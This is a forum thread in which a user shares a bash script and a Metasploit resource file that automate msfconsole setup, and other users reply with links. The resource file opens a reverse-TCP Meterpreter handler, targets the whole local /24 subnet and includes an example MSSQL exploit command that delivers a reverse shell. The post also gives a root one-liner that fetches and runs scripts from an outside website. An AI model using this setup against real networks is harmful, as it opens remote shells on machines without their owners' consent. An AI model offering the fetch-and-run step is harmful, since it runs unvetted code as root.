basic metasploit automation tasks

[brtw2003]

are you tired to do the same things over and over again in msf3, especially setting basic options?

here is what I use for my daily msf3-usage.....

copy&paste the basic shell script below, also the base.msf3 content and just change the paths to reflect your environment!

OR for the lazy ones...
run this in a root terminal:

Code:

mkdir -p /opt/_PRODUCTION/_LOGS/msf3 /opt/_HOMEGR0WN/bin/CONF/ && cd /opt/_HOMEGR0WN/bin && wget -q http://zerohat.de/_shared_files/start_msf3 && cd /opt/_HOMEGR0WN/bin/CONF && wget -q http://zerohat.de/_shared_files/msf3.base && export PATH=$PATH:/opt/_HOMEGR0WN/bin && start_msf3

starting msf3 via a simple bash script, below my start-msf3 script
(it will look for your active network interface and change basic msf3 options in a resource file called msf3.base)

Code:

#!/bin/bash

#
#base vars
#
LOG="/opt/_PRODUCTION/_LOGS/msf3"
ACTIVE_IF=$(netstat -anr |grep UG |awk -F" " '{print $8}')
IF_IP=$(ifconfig $ACTIVE_IF |grep "inet addr" |gawk -F: '{print $2}' |cut -d" " -f1)
IF_MAC=$(macchanger -s $ACTIVE_IF |gawk -F" " '{print $3}')
IP_SUBNET=$(echo $IF_IP |cut -d"." -f1-3)

#
#change necessary vars in the base msf3 resource file
#
sed -i "s/^setg LHOST.*/setg LHOST $IF_IP/g" /opt/_HOMEGR0WN/bin/CONF/msf3.base
sed -i "s/^setg RHOSTS.*/setg RHOSTS $IP_SUBNET.0\/24/g" /opt/_HOMEGR0WN/bin/CONF/msf3.base
sed -i "s/^setg SHOST.*/setg SHOST $IF_IP/g" /opt/_HOMEGR0WN/bin/CONF/msf3.base
sed -i "s/^setg SMAC.*/setg SMAC $IF_MAC/g" /opt/_HOMEGR0WN/bin/CONF/msf3.base
sed -i "s/^setg INTERFACE.*/set INTERFACE $ACTIVE_IF/g" /opt/_HOMEGR0WN/bin/CONF/msf3.base

cd /opt/metasploit3/msf3
printf "\n\n"
read -p ">> Should we update msf3 (y/n)? _ " -e update

if [ $update == "y" ]; then
  printf "\n...be patient, takes a moment to update..\n"
  svn update
fi

./msfconsole -r /opt/_HOMEGR0WN/bin/CONF/msf3.base

Note:SMAC needed for auxiliary scanner/discovery/arp_sweep - if you wanna do an arp sweep


here the content of the /opt/_HOMEGR0WN/bin/CONF/msf3.base file:
(remember, our msf3-startup script will change some of these vars every time you call it)

Code:

db_driver sqlite3
db_destroy /opt/_PRODUCTION/_LOGS/msf3/msf3_base.db
db_create /opt/_PRODUCTION/_LOGS/msf3/msf3_base.db
load db_tracker

setg SessionLogging true
setg ConsoleLogging true

setg LHOST x.x.x.x
setg RHOSTS x.x.x.x/24
setg SHOST x.x.x.x
setg SMAC 00:xx:ca:20:xx:xx
set INTERFACE wlan1
setg THREADS 50
setg LPORT 445
setg OUTPUTPATH /opt/_PRODUCTION/_LOGS/msf3

use multi/handler
exploit -j -z -p windows/meterpreter/reverse_tcp

back
setg
jobs -l

Note: Logs will go into your ~/.msf3/logs directory !

Also you can add your favorite exploit to start with, like:

use exploit/windows/mssql/ms09_004_sp_replwritetovarbin
exploit -j -z -o RHOST=x.x.x.x,DisablePayloadHandler=true -p windows/shell/reverse_tcp
(we also set to disable current payload handler to use a different one for this exploit)

/have fun, brtw2003

[opreat0r]

heres my meterpreter cheat sheet
Metasploit meterpreter cheat sheet reference

[elliotdark]

thank you

[55Rh7]

Might be helpful: Metasploit: Automating the Metasploit Console

[55Rh7]

Seems to be helpful as well: Metasploit: Automating the Metasploit Console